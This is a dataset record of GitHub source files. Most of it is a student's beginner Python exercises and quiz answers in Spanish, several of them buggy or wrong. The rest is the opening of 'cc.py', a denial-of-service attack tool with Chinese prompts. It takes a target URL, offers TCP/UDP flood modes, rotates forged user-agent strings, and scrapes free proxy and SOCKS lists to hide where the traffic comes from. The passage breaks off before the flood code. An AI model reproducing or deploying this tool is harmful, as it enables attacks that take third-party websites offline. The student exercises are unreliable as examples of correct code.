[ { "alpha_fraction": 0.4886363744735718, "alphanum_fraction": 0.5227272510528564, "avg_line_length": 13.5, "blob_id": "5b4b6df1222472036fb1b6cfba1cbfaa62287206", "content_id": "d0bdb009f1931f88aef0ab6cab6a28fe9f5f17ee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 89, "license_type": "no_license", "max_line_length": 26, "num_lines": 6, "path": "/Práctica1/NumerosImpares.py", "repo_name": "algoritmos-2019-2/clase-1-NancyEscamilla", "src_encoding": "UTF-8", "text": "num = int(input(\"Número\"))\ni = 1\nwhile i <= num:\n print(i)\n i = (i*2)+1\nprint(\"Fin\") \n" }, { "alpha_fraction": 0.6220095753669739, "alphanum_fraction": 0.6411483287811279, "avg_line_length": 25.125, "blob_id": "01d535a35fcd76ac9a4725008e79461e14c651cc", "content_id": "a25797d6b4feed678314c5088a3b27a510f0d868", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 212, "license_type": "no_license", "max_line_length": 48, "num_lines": 8, "path": "/Práctica1/Fibonacci.py", "repo_name": "algoritmos-2019-2/clase-1-NancyEscamilla", "src_encoding": "UTF-8", "text": "num = int(input(\"¿Cuantos terminos necesitas?\"))\nx=0\ny=1\nfor i in range(num):\n print(x)\n t=y #Se va haciendo un bucle\n y=x+y #Def una función para la sucesión\n x=t #Tomando valores de f(n-1) + f(n-2)\n" }, { "alpha_fraction": 0.3691376745700836, "alphanum_fraction": 0.40393343567848206, "avg_line_length": 16.36842155456543, "blob_id": "f91b3b193cbf811e5c8512b13c382808e217b84f", "content_id": "bcccf8bcedc620ad426ec043c2447f2767c98d6c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 661, "license_type": "no_license", "max_line_length": 61, "num_lines": 38, "path": "/mylibSeno.py", "repo_name": "algoritmos-2019-2/clase-1-NancyEscamilla", "src_encoding": "UTF-8", "text": "def factorial(n):\n if n == 0:\n return 1\n else\n return n * factorial(n-1)\n\n\n\ndef seno(x, n):\n i == 0\n suma = 0\n while i <n:\n aux = 2*i + 1\n suma = ((-1)**i/factorial(aux))*x**aux + suma\n i +=1\n return suma\n \nprint(seno(0,6))\n\n\ndef coseno(x, n):\n i = 0\n suma = 0\n while i <n:\n aux = 2*1\n suma = ((-1)**aux/factorial(aux))*x**aux + suma\n i +=1\n return suma\n\nprint(coseno(0,6))\n\n\ndef mult(e,lista):\n new=[]\n for i in lista:\n new.append(i*e)\n return new\nprint(mult(2., [2,3,4]))\n\n" }, { "alpha_fraction": 0.5933504104614258, "alphanum_fraction": 0.5933504104614258, "avg_line_length": 14.600000381469727, "blob_id": "53060b7b1301bfb559ed150bab903db11e932287", "content_id": "72aeb9032dfca4a9f10a3edc58e40b0586f9c445", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 391, "license_type": "no_license", "max_line_length": 47, "num_lines": 25, "path": "/Práctica1/TablasDeVerdad.py", "repo_name": "algoritmos-2019-2/clase-1-NancyEscamilla", "src_encoding": "UTF-8", "text": "booleanos = [False, True]\n\n#Tabla or\nprint ('x/ty/tx or y') #Los \\t son tabuladores\nfor x in booleanos:\n for y in booleanos:\n print(x, y, x or y, sep = '/t')\n\nprint()\n\n\n#Tabla and \nprint('x/ty/tx and y')\nfor x in booleanos:\n for y in booleanos:\n print (x, y, x and y, sep = '/t')\n\nprint()\n\n#Tabla not\nprint('x/tnot x')\nfor x in booleanos:\n print(x, not x,sep = '/t')\n\nprint() \n" }, { "alpha_fraction": 0.7592644691467285, "alphanum_fraction": 0.7705799341201782, "avg_line_length": 42.10975646972656, "blob_id": "dd91a4d8d04f0b175ecb3fa65af7fc77f6fb8120", "content_id": "fd6a15ea89bdc7ddef79965c7b281fcac79cb6fb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3626, "license_type": "no_license", "max_line_length": 204, "num_lines": 82, "path": "/Práctica2.py", "repo_name": "algoritmos-2019-2/clase-1-NancyEscamilla", "src_encoding": "UTF-8", "text": "Funciones\n¿Por qué son ventajosas las funciones para tener en sus programas? \nPorque se pueden llamar en cualquier parte del código y hacer uso de ellas\n\n¿Cuándo se ejecuta el código en una función:cuando se define la función o cuando se llama a la función?\nEl codigo se ejecuta cuando se llama a la funcion que se definio anteriormente y se cumplen las especificaciones\n\n¿Qué enunciado crea una función? \nSe debe poner el comando def seguido del nombre de la función que queremos y dentro de () los argumentos que queremos, ademas de colocar return (argumentos) si queremos que nos devuelva algo dicha función\n\n¿Cuál es la diferencia entre una función y una llamada de función?\nUna función es cuando estas definiendo las variables incluidas en esta y cuando llamas a una función es porque la vas a utilizar en alguna parte del código\n\n¿Cuántos ambitos globales hay en un programa de Python?¿Cuántos ambitos locales?\nSe pueden tener cuantas variables querramos definir, siempre y cuando no tenagn el mismo nombre o se formaria un bucle \n\n¿Qué sucede con las variables en un ámbito local cuando se devuleve la llamada a la función?\nNo aparecen\n\n¿Qué es un valor de retorno?¿Puede un valor de retorno ser parte de una expresión?\nUn valor de retorno es lo que te regresa cuando llamas a una función y dicho valor esta definido dentro de las caracteristicas y puede ser utilizado como parte de una expresion \n\nSi una función no tiene una declaración de retorno, ¿cuál es el valor de retorno de una llamada a es a función?\nLa misma función \n\n¿Cómo puede forzar una variable en una función para referirse a la variable global?\nLlamando a la variable desde dentro \n\n¿Cuál es el tipo de datos de None? \nRepresentan un valor vacío, generalmente se utilizan en return\n\n¿Qué hace la declaración import random?\nLlama a una libreria en la que está definida la función random\n\nSi tuviera una función llamada randint() en un módulo llamado random,¿cómo lo llamaría despues de iimportar random?\nLo llamaría int() dentro de la librería\n\n\nListas y Tuplas\n¿Qué es []?\nSon corchetes que se utilizan para definir valores en una lista\n\n¿Cómo asignaría el valor 'hola' como el tercer valor en una lista almacenada? en una variable llamada spam?\n(Supongamos que el spam contiene [2, 4, 6, 8, 10].Para las siguientes 3 preguntas, digamos que spam contiene la lista [2, 4, 6, 8, 10])\nSe tendría que poner spam[2]= \"hola\" u spam.insert(2,\"hola\")\n\n¿Qué evalua spam[int('3'*2) / 11]?\nSe está multiplicando el valor del índice 3 por 2...(?)\n\n¿Qué evalua spam[-1]?\nEl último termino de la lista\n\n¿Qué evalua spam[: 2]?\nEvalua los elementos de la lista desde el 0 al 2, en este caso 2, 4, 6\n\nPara las siguientes 3 preguntas, digamos que bacon contiene la lista [3.14, 'cat', 11, 'cat', True]\n¿Qué evalua bacon.index('cat')?\nTe da la posicion en la que está la variable 'cat'\n\n¿Qúe evalua bacon.append(99)?\nEscribe una función en este caso 99\n\n¿Qué hace bacon.remove('cat')?\nLO quita de la lista\n\n¿Cuales son los operadores para la concatenacion de listas y la repplicación de listas? \nSuma y extend()\n\n¿Cúal es la diferencia entre los métodos de lista append() e insert()?\nCon append se pueden llamar funciones e incluso otras listas completas y con insert variables\n\n¿Cual es la diferencia entre listas y tuplas?\nLa tupla no tiene métodos y no es mutable(no se puede modificar)\n\n\nProyecto Práctico:\n-testprime() que verifique si un número es primo\n#Un número primo es aquel que solo es divisible entre 1 y el mismo\ndef testprime(n)\n int num1\n a==\n for(i=n...\n" }, { "alpha_fraction": 0.7816091775894165, "alphanum_fraction": 0.7816091775894165, "avg_line_length": 20.75, "blob_id": "f30d497419fc05e1fbba3054e9d717c36c15db47", "content_id": "cff90adada30fe3b60916896dba8d53ecd8c6a25", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 89, "license_type": "no_license", "max_line_length": 64, "num_lines": 4, "path": "/README.md", "repo_name": "algoritmos-2019-2/clase-1-NancyEscamilla", "src_encoding": "UTF-8", "text": "# Algoritmos\nNancy Alejandra Escamilla Avila \n\nEn este repositorio se añadirá todos los programas para el curso\n" }, { "alpha_fraction": 0.5876288414001465, "alphanum_fraction": 0.6082473993301392, "avg_line_length": 15.166666984558105, "blob_id": "922a9d4d5369c2460c1208d6a51daafa10e94c13", "content_id": "eb30323b79de074e20bf103f73f50c8936bac07a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 98, "license_type": "no_license", "max_line_length": 26, "num_lines": 6, "path": "/Práctica1/Factorial.py", "repo_name": "algoritmos-2019-2/clase-1-NancyEscamilla", "src_encoding": "UTF-8", "text": "num = int(input(\"Número\"))\nfac = 1\nfor i in range(num):\n fac = fac*num\n num = num-1\nprint(fac)\n" }, { "alpha_fraction": 0.5491803288459778, "alphanum_fraction": 0.5696721076965332, "avg_line_length": 11.199999809265137, "blob_id": "bf15cf7cd3016b3f2c8905f2cd808f43c664c2af", "content_id": "2645b13ed9e14a2d3d0dec208da46d3e495808c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 246, "license_type": "no_license", "max_line_length": 29, "num_lines": 20, "path": "/Práctica1/SumaNumerosForyWhile.py", "repo_name": "algoritmos-2019-2/clase-1-NancyEscamilla", "src_encoding": "UTF-8", "text": "#For\nsuma = 0\nnum = int(input(\"Número\"))\n\nfor i in range(num+1):\n sum = sum + i\nprint(\"suma de número hasta\")\nprint(num)\nprint(\"es:\")\nprint(suma) \n\n#While\ni = 0\nsuma = 0\nwhile i<n:\n print (i)\n i = i +1\n suma = suma +i\n\nprint(suma)\n" } ]
8
kavinduchamiran/Mambos-Proxy-Signature
https://github.com/kavinduchamiran/Mambos-Proxy-Signature
c36db661ebb34e49e4809fc19d6e509791dbecba
ad60622fafb3328f22257512f214c0c1e2c12379
534d3e03e2757e8750ddf8cfe6d9898372158988
refs/heads/master
2020-05-26T12:18:17.529948
2019-06-07T03:41:52
2019-06-07T03:41:52
188,228,941
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.30763527750968933, "alphanum_fraction": 0.7779836654663086, "avg_line_length": 31.493976593017578, "blob_id": "b311d3bd4fb5fb2bc14a10e0c93be4a78850888c", "content_id": "4763ba9464c61c287c902cc24f6a59e47b2c0c28", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2698, "license_type": "no_license", "max_line_length": 170, "num_lines": 83, "path": "/main.py", "repo_name": "kavinduchamiran/Mambos-Proxy-Signature", "src_encoding": "UTF-8", "text": "import gmpy2 as gm\nimport functions as fn\nimport random\n\n# rs = gm.random_state()\n\n# q = fn.generate_prime(511)\n# p = q*2 + 1\n#\n# while(not gm.is_prime(p)):\n# q = fn.generate_prime(511)\n# p = q * 2 + 1\n#\n# print(q)\n# print(p)\n\nq = gm.mpz(6703903964971298549787012499102923063739682609682746093811160926804801890221671406527729788070298930569933395670018233282113329633315901313810958385152023)\np = gm.mpz(13407807929942597099574024998205846127479365219365492187622321853609603780443342813055459576140597861139866791340036466564226659266631802627621916770304047)\n\n# g = random.randrange(1, p)\n#\n# p1 = gm.powmod(g, q, p)\n# p2 = gm.powmod(g, 2, p)\n#\n# while(p1 == 1 or p2 == 1):\n# g = random.randrange(1, p)\n#\n# p1 = gm.powmod(g, q, p)\n# p2 = gm.powmod(g, 2, p)\n\ng = gm.mpz(8710818255379839923196548866147732015636108867054301571579120201404656816237014445780162103674562653392697980776256695018015245076267408158469291270696559)\n\n# s = random.randrange(1, p-1)\n# v = gm.powmod(g, s, p)\n\ns = gm.mpz(6603076457106034848742957409797976144863570308259298850794007927122882368071832808623387721809154712398085958478809285222917739832130418213190888381666320)\noriginal_private = s\n\nv = gm.mpz(10815388246748225787573331543858716487437979979676928077473442812363936255694810219792839605343315482959547749784354782242081984831399046543073178981168692)\noriginal_public = v\n\nk = random.randrange(1, p-2)\nK = gm.powmod(g, k, p)\n\nk = gm.mpz(934399007794975508151188738151484151961916816169553860202339985884764541480857959125079975808439200383790758038133259931519923138325313821515533581351682)\nK = gm.mpz(3970790412583064084756949362240295935927251035110845543874273568343077539733199222646540796388072296031096069412048165264625345860706440741872236283170790)\n\n# sigma = (s + k * K) % (p - 1)\n\nsigma = gm.mpz(1599844828480432996670936450307491188612511817228907936025817182927186568673377894841834068826933399374833623579771859973397175895631949922313558451139090)\nproxy_private = sigma\n\nlhs = gm.powmod(g, sigma, p)\n\ntemp = gm.powmod(K, K, p)\nrhs = (v * temp) % p\n\nproxy_public = rhs\n\nprint(lhs == rhs)\n\n\nm = 12345678\n\n(ori_r, ori_sig) = fn.sign(m, g, original_private, p)\nori_verify = fn.verify(p, g, original_public, ori_r, ori_sig, m)\n\nprint(ori_verify)\n\n(proxy_r, proxy_sig) = fn.sign(m, g, proxy_private, p)\nproxy_verify = fn.verify(p, g, proxy_public, proxy_r, proxy_sig, m)\n\nprint(proxy_verify)\n\n(ori_r, ori_sig) = fn.sign(m, g, original_private, p)\nori_verify = fn.verify(p, g, proxy_public, ori_r, ori_sig, m)\n\nprint(ori_verify)\n\n(proxy_r, proxy_sig) = fn.sign(m, g, proxy_private, p)\nproxy_verify = fn.verify(p, g, original_public, proxy_r, proxy_sig, m)\n\nprint(proxy_verify)\n\n" }, { "alpha_fraction": 0.49504950642585754, "alphanum_fraction": 0.5473833084106445, "avg_line_length": 19.22857093811035, "blob_id": "a92c7018e69d0481231575f0a3ee303024bed165", "content_id": "ae43731e9011baba6d13991da222e65afbd1d259", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 707, "license_type": "no_license", "max_line_length": 47, "num_lines": 35, "path": "/functions.py", "repo_name": "kavinduchamiran/Mambos-Proxy-Signature", "src_encoding": "UTF-8", "text": "import gmpy2\nimport random\n\nrand_state = gmpy2.random_state(42)\n\ndef generate_prime(bits):\n temp = gmpy2.mpz_rrandomb(rand_state, bits)\n return gmpy2.next_prime(temp)\n\n\ndef sign(m, alpha, a, p):\n k = random.randrange(1, p-2)\n\n while(gmpy2.gcd(k, p-1) != 1):\n k = random.randrange(1, p - 2)\n\n r = gmpy2.powmod(alpha, k, p)\n\n temp1 = gmpy2.powmod(k, -1, p - 1)\n temp2 = (m - a * r) % (p - 1)\n\n s = (temp1 * temp2) % (p - 1)\n return (r, s)\n\ndef verify(p, alpha, y, r, s, m):\n if not(1 <= r and r <= p-1):\n return 0\n\n temp1 = gmpy2.powmod(r, s, p)\n temp2 = gmpy2.powmod(y, r, p)\n v1 = (temp1*temp2) % p\n\n v2 = gmpy2.powmod(alpha, m, p)\n\n return v1 == v2" } ]
2
mbortoli/FashioNet
https://github.com/mbortoli/FashioNet
7f66adacd99775a41141c9518088de36c526ecc1
5b5ddaaf3c3960d091f870844619522293e16ec5
949871ac48700d56c366b668b596204787dae136
refs/heads/master
2020-06-01T18:33:04.896002
2019-06-08T14:29:52
2019-06-08T14:29:52
190,883,417
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.7573117613792419, "alphanum_fraction": 0.7803360223770142, "avg_line_length": 63.279998779296875, "blob_id": "e538adb294e261c8ddfefafa9e2318bced0e2fdd", "content_id": "85d6db0f9fbc76d3e5749aadb845c74091fdbef2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3266, "license_type": "no_license", "max_line_length": 353, "num_lines": 50, "path": "/README.md", "repo_name": "mbortoli/FashioNet", "src_encoding": "UTF-8", "text": "# FashioNet\n\nO projeto nasceu como uma ideia simples para apresentarmos ao final do curso ao lembrarmos de um pedido antigo (mas recorrente) da minha irmã: Aplicativo igual ao que aparece no filme \"As patricinhas de Beverly Hills\".\n\n![eu sei, eu sei...](https://badulakit.files.wordpress.com/2013/07/closet-cher.jpg)\n\nA idéia basica é tentar classificar se a parte de cima da roupa (i.e. camiseta) combina com a parte de baixo (i.e., calça ou bermuda).\n\nInfelizmente ~~(ou felizmente)~~ não temos como digitalizar todas as roupas, mas podemos tirar foto de algumas peças para utilizar no _dataset_. Ele foi criado dessa forma a partir das roupas que possuímos.\n\nCom as imagens preparadas, utilizamos a biblioteca `fastai` para treinar duas arquiteturas: _ResNet34_ e _ResNet50_. Dessa forma foi possível consolidar os conhecimentos adquiridos durante o curso e comparar as duas arquiteturas. Acreditavamos que a arquitetura mais complexa pudesse classificar melhor, mas isso não foi observado nos resultados finais.\n\nNo final, observamos que a arquitetura _ResNet34_ sobressaiu à _ResNet50_, algo que foi verificado **somente** ao expô-las à imagens não utilizadas no treinamento e validação. Esse passo demonstra a importância de testar os modelos.\n\n# Cadernos\n\nEstão localizados dentro da pasta [`src`](src), sendo: \n* [`nb-train-resnet34.ipynb/nb-train-resnet34.ipynb`](src) - Treinamento da resnet34\n* [`nb-train-resnet50.ipynb`](src/nb-train-resnet50.ipynb) - Treinamento da resnet50\n* [`testing.ipynb`](src/testing.ipynb) - Testando a rede com imagens não vistas\n* [`make-labels.ipynb`](src/make-labels.ipynb) - `Widget` para auxiliar na classificação manual das imagens\n\n\n# O _dataset_\n\nForam tiradas fotos das peças individuais, resultando em 19 peças superiores e 15 peças inferiores, que depois foram cortadas para centralizar cada peça. Então combinamos as peças superiores com as inferiores, gerando um total de 285 pares, sendo utilizados 75% para treinamento e 25% para validação.\n\nApós treinamento, também geramos 12 combinações a mais para serem utilizadas no teste das redes.\n\nTodas as imagens resultantes foram redimensionadas para 250x250 pixels para melhor performance da rede - mas você pode testar as originais continas na pasta [`dataset/v1`](dataset/v1) e ver como elas se saem com as mesmas transformações aplicadas pela `fastai` :-)\n\nNesse sentido, o arquivo [`labeled_v2.csv`](labeled_v2.csv) foi criado através do caderno [`make-labels`](src/make-labels.ipynb), onde contém as classificações corretas para cada imagem - com ajuda externa (obivamente eu sou o meu publico alvo).\n\nExemplo de algumas imagens geradas:\n\n![IMG](dataset/v2-resized/IMG_8723.JPG-IMG_8747.JPG) ![IMG](dataset/v2-resized/IMG_8723.JPG-IMG_8749.JPG)\n\nVocê consegue dizer qual combina e qual não combina? Se você não consegue, essa ideia também é para você!\n\n# Dependências\n\nPara executar os cadernos se faz necessário a biblioteca [`fastai v1`](https://github.com/fastai/fastai).\n\n# Observações\n\nReconheço que o código esteja meio sujo e pretendo melhorar isso com o tempo.\n\n\n# Terminamos com uma foto do maior estilista de todos os tempos\n![](https://www.agoralaguna.com.br/wp-content/uploads/2019/04/cantor-falcao.jpg)\n" }, { "alpha_fraction": 0.6232081651687622, "alphanum_fraction": 0.6259385943412781, "avg_line_length": 35.20512771606445, "blob_id": "204f8a8b29c2da7e50ed89783ac808b0de9a7bf8", "content_id": "21a94a1b5cb7fa976331acd3a409727495cac9ea", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1465, "license_type": "no_license", "max_line_length": 150, "num_lines": 39, "path": "/src/image_labeler.py", "repo_name": "mbortoli/FashioNet", "src_encoding": "UTF-8", "text": "from ipywidgets import widgets, Layout\r\nfrom IPython.display import clear_output, display\r\nfrom enum import Enum\r\n\r\n__all__ = ['ImageLabeler', 'SelectionTypeEnum']\r\n\r\nclass SelectionTypeEnum(Enum):\r\n \"\"\"\r\n Types allowed for label selection.\r\n \"\"\"\r\n OPEN_FIELD = 1\r\n MULTIPLE = 2\r\n ONLY_ONE = 3\r\n\r\nclass ImageLabeler():\r\n \"\"\"\r\n Displays images for labeling or deletion and saves them in `path` as 'labeled.csv'.\r\n Based on image_cleaner.py from fastai. \r\n `https://github.com/fastai/fastai/blob/master/fastai/widgets/image_cleaner.py`\r\n \"\"\"\r\n def __init__(self, path, batch_size:int=5, default_label:str='', label_options=[], selection_type:SelectionTypeEnum=SelectionTypeEnum.OPEN_FIELD):\r\n self._images_paths = [path + f for f in listdir(path)]\r\n self._batch_size = batch_size\r\n self._default_label = default_label\r\n self._label_options = label_options\r\n self._selection_type = selection_type\r\n self._csv_dict = dict()\r\n self.render()\r\n\r\n @classmethod\r\n def render(self):\r\n \"Re-render Jupyter cell for batch of images.\"\r\n clear_output()\r\n self.write_csv()\r\n if self.empty():\r\n return display('No more images to label')\r\n else:\r\n display(self.make_horizontal_box(self.get_widgets(self._duplicates)))\r\n display(self.make_button_widget('Next Batch', handler=self.next_batch, style=\"primary\"))\r\n \r\n" }, { "alpha_fraction": 0.6552197933197021, "alphanum_fraction": 0.6607142686843872, "avg_line_length": 37.31578826904297, "blob_id": "abc2ee2ed56d71c87eb53a4e1d1a50ac9cefe8f0", "content_id": "8f8f4cb551dd2874f515105ed22b5262f7ebde04", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 728, "license_type": "no_license", "max_line_length": 103, "num_lines": 19, "path": "/src/resizeImages.py", "repo_name": "mbortoli/FashioNet", "src_encoding": "UTF-8", "text": "from os import listdir\nfrom os.path import isfile, join\nimport numpy as np\nfrom PIL import Image\n\npath = 'Images/'\nresized = path+'resized/'\ncombined = path+'combined/'\nupper_files = [combined + f for f in listdir(combined) if f.startswith('IMG')]\nbottom_files = [cropped_bottom + f for f in listdir(cropped_bottom) if isfile(join(cropped_bottom, f))]\nfor u in upper_files:\n upper_image = Image.open(u)\n for b in bottom_files:\n print(u, b)\n bottom_image = Image.open(b)\n combined_image = np.vstack([upper_image, bottom_image])\n #print(combined_image)\n combined_image = Image.fromarray(combined_image)\n combined_image.save(combined + u.split('/', 1)[1] + '-' + b.split('/', 1)[1])\n" }, { "alpha_fraction": 0.6759259104728699, "alphanum_fraction": 0.6898148059844971, "avg_line_length": 42.20000076293945, "blob_id": "9666eb5fff24f3e138ac0c0a86e1811c2b761475", "content_id": "71acf6a7e17cb8b05b3b996403578f64d59d3ba7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 864, "license_type": "no_license", "max_line_length": 103, "num_lines": 20, "path": "/src/combinarImagens.py", "repo_name": "mbortoli/FashioNet", "src_encoding": "UTF-8", "text": "# https://stackoverflow.com/questions/30227466/combine-several-images-horizontally-with-python\nfrom os import listdir\nfrom os.path import isfile, join\nimport numpy as np\nfrom PIL import Image\n\ncropped_upper = 'cropped_upper/'\ncropped_bottom = 'cropped_bottom/'\ncombined = 'combined/'\nupper_files = [cropped_upper + f for f in listdir(cropped_upper) if isfile(join(cropped_upper, f))]\nbottom_files = [cropped_bottom + f for f in listdir(cropped_bottom) if isfile(join(cropped_bottom, f))]\nfor u in upper_files:\n upper_image = Image.open(u)\n for b in bottom_files:\n print(u, b)\n bottom_image = Image.open(b)\n combined_image = np.vstack([upper_image, bottom_image])\n #print(combined_image)\n combined_image = Image.fromarray(combined_image)\n combined_image.save(combined + u.split('/', 1)[1] + '-' + b.split('/', 1)[1])\n" } ]
4
mikekitckchan/CCAttack
https://github.com/mikekitckchan/CCAttack
33b38110856a9ca708e491cbd940e30ea05d0046
8d9e54217dae81450fc5204b0ceb8af61441d991
6de05d49c2acd47e27702be00af9cd8f753a69e9
refs/heads/master
2020-07-05T11:05:12.978198
2019-08-16T00:57:45
2019-08-16T00:57:45
202,632,618
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6648865938186646, "alphanum_fraction": 0.6824067234992981, "avg_line_length": 45.33898162841797, "blob_id": "c7fede87657c6db343c754aa7c313e36928b6e65", "content_id": "2e5f99edd3f5cbdb2ddf658044a37d1e5b5814a5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27812, "license_type": "no_license", "max_line_length": 249, "num_lines": 590, "path": "/cc.py", "repo_name": "mikekitckchan/CCAttack", "src_encoding": "UTF-8", "text": "import socket\nimport socks\nimport threading\nimport random\nimport re\nimport urllib.request\nimport os\nimport sys\nfrom bs4 import BeautifulSoup\n\n\ntry: # se si è sotto linux scapy (per l'attacco tcp-udp) funziona\n\tfrom scapy.all import * # importa scapy\nexcept: # altrimenti, se fallisce l'importazione\n\tprint (\"在此系统下不支持TCP / UDP洪水。 你必须使用HTTP.\") # printa questo\n\nprint('''\nby INDDOS\nEdited by caoip.com\n\t''') # Author and Editor\n\n\nuseragents=[\"AdsBot-Google ( http://www.google.com/adsbot.html)\",\n\t\t\t\"Avant Browser/1.2.789rel1 (http://www.avantbrowser.com)\",\n\t\t\t\"Baiduspider ( http://www.baidu.com/search/spider.htm)\",\n\t\t\t\"Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)\",\n\t\t\t\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0\",\n\t\t\t\"Mozilla/5.0 (iPhone; CPU iPhone OS 9_3_4 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G35 Safari/601.1\",\n\t\t\t\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36)\",\n\t\t\t\"Mozilla/5.0 (X11; U; Linux x86_64; en-us) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.117 Safari/537.36 Puffin/7.1.2.18064AP\",\n\t\t\t]\n\n\ndef starturl(): # Set a function for attack\n\tglobal url\n\tglobal url2\n\tglobal urlport\n\n\turl = input(\"\\n请输入网址: \").strip()\n\n\tif url == \"\":\n\t\tprint (\"请输入网址.\")\n\t\tstarturl()\n\n\ttry:\n\t\tif url[0]+url[1]+url[2]+url[3] == \"www.\":\n\t\t\turl = \"http://\" + url\n\t\telif url[0]+url[1]+url[2]+url[3] == \"http\":\n\t\t\tpass\n\t\telse:\n\t\t\turl = \"http://\" + url\n\texcept:\n\t\tprint(\"你错了,再试一次.\")\n\t\tstarturl()\n\n\ttry:\n\t\turl2 = url.replace(\"http://\", \"\").replace(\"https://\", \"\").split(\"/\")[0].split(\":\")[0]\n\texcept:\n\t\turl2 = url.replace(\"http://\", \"\").replace(\"https://\", \"\").split(\"/\")[0]\n\n\ttry:\n\t\turlport = url.replace(\"http://\", \"\").replace(\"https://\", \"\").split(\"/\")[0].split(\":\")[1]\n\texcept:\n\t\turlport = \"80\"\n\n\tfloodmode()\n\ndef floodmode(): # The choice of mode\n\tglobal choice1\n\tchoice1 = input('你的目标是 ' + url + \" 输入“0”进行确认:\")\n\tif choice1 == \"0\":\n\t\tproxymode()\n\telif choice1 == \"1\":\n\t\ttry:\n\t\t\tif os.getuid() != 0: # check if ROOT permission is enable\n\t\t\t\tprint(\"您需要以root身份运行此程序才能使用TCP / UDP泛洪.\") # printa questo\n\t\t\t\texit(0) # exit\n\t\t\telse: # otherwise\n\t\t\t\tfloodport() # continue\n\t\texcept:\n\t\t\tpass\n\telif choice1 == \"2\":\n\t\ttry:\n\t\t\tif os.getuid() != 0:\n\t\t\t\tprint(\"您需要以root身份运行此程序才能使用TCP / UDP泛洪.\")\n\t\t\t\texit(0)\n\t\t\telse:\n\t\t\t\tfloodport()\n\t\texcept:\n\t\t\tpass\n\telse:\n\t\tprint (\"你错了,再试一次.\")\n\t\tfloodmode()\n\ndef floodport():\n\tglobal port\n\ttry:\n\t\tport = int(input(\"输入要测试的端口: \"))\n\t\tportlist = range(65535)\n\t\tif port in portlist:\n\t\t\tpass\n\t\telse:\n\t\t\tprint (\"你错了,再试一次.\")\n\t\t\tfloodport()\n\texcept ValueError:\n\t\tprint (\"你错了,再试一次.\") # printa questo e\n\t\tfloodport() # riparte la funzione e ti fa riscrivere\n\tproxymode()\n\ndef proxymode():\n\tglobal choice2\n\tchoice2 = input(\"你想在攻击中使用代理/IP吗? 如果你愿意,回答'y': \")\n\tif choice2 == \"y\":\n\t\tchoiceproxysocks()\n\telse:\n\t\tnumthreads()\n\ndef choiceproxysocks():\n\tglobal choice3\n\tchoice3 = input(\"键入“0”以使用代理或键入“1”以使用socks: \")\n\tif choice3 == \"0\":\n\t\tchoicedownproxy()\n\telif choice3 == \"1\":\n\t\tchoicedownsocks()\n\telse:\n\t\tprint (\"你错了,再试一次.\")\n\t\tchoiceproxysocks()\n\ndef choicedownproxy():\n\tchoice4 = input(\"您要下载新的代理列表吗? 回答'y'来做: \")\n\tif choice4 == \"y\":\n\t\turlproxy = \"http://free-proxy-list.net/\"\n\t\tproxyget(urlproxy)\n\telse:\n\t\tproxylist()\n\ndef choicedownsocks():\n\tchoice4 = input(\"你想下载一个新的socks列表吗? 回答'y'来做: \")\n\tif choice4 == \"y\":\n\t\turlproxy = \"https://www.socks-proxy.net/\"\n\t\tproxyget(urlproxy)\n\telse:\n\t\tproxylist()\n\ndef proxyget(urlproxy): # lo dice il nome, questa funzione scarica i proxies\n\ttry:\n\t\treq = urllib.request.Request((\"%s\") % (urlproxy)) # qua impostiamo il sito da dove scaricare.\n\t\treq.add_header(\"User-Agent\", random.choice(useragents)) # siccome il format del sito e' identico sia\n\t\tsourcecode = urllib.request.urlopen(req) # per free-proxy-list.net che per socks-proxy.net,\n\t\tpart = str(sourcecode.read()) # imposto la variabile urlproxy in base a cosa si sceglie.\n\t\tpart = part.split(\"<tbody>\")\n\t\tpart = part[1].split(\"</tbody>\")\n\t\tpart = part[0].split(\"<tr><td>\")\n\t\tproxies = \"\"\n\t\tfor proxy in part:\n\t\t\tproxy = proxy.split(\"</td><td>\")\n\t\t\ttry:\n\t\t\t\tproxies=proxies + proxy[0] + \":\" + proxy[1] + \"\\n\"\n\t\t\texcept:\n\t\t\t\tpass\n\t\tout_file = open(\"proxy.txt\",\"w\")\n\t\tout_file.write(\"\")\n\t\tout_file.write(proxies)\n\t\tout_file.close()\n\t\tprint (\"代理已成功下载.\")\n\texcept: # se succede qualche casino\n\t\tprint (\"\\nERROR!\\n\")\n\tproxylist() # se va tutto liscio allora prosegue eseguendo la funzione proxylist()\n\ndef proxylist():\n\tglobal proxies\n\tout_file = str(input(\"输入proxylist文件名/路径(proxy.txt): \"))\n\tif out_file == \"\":\n\t\tout_file = \"proxy.txt\"\n\tproxies = open(out_file).readlines()\n\tnumthreads()\n\ndef numthreads():\n\tglobal threads\n\ttry:\n\t\tthreads = int(input(\"输入线程数(默认为1000): \"))\n\texcept ValueError:\n\t\tthreads = 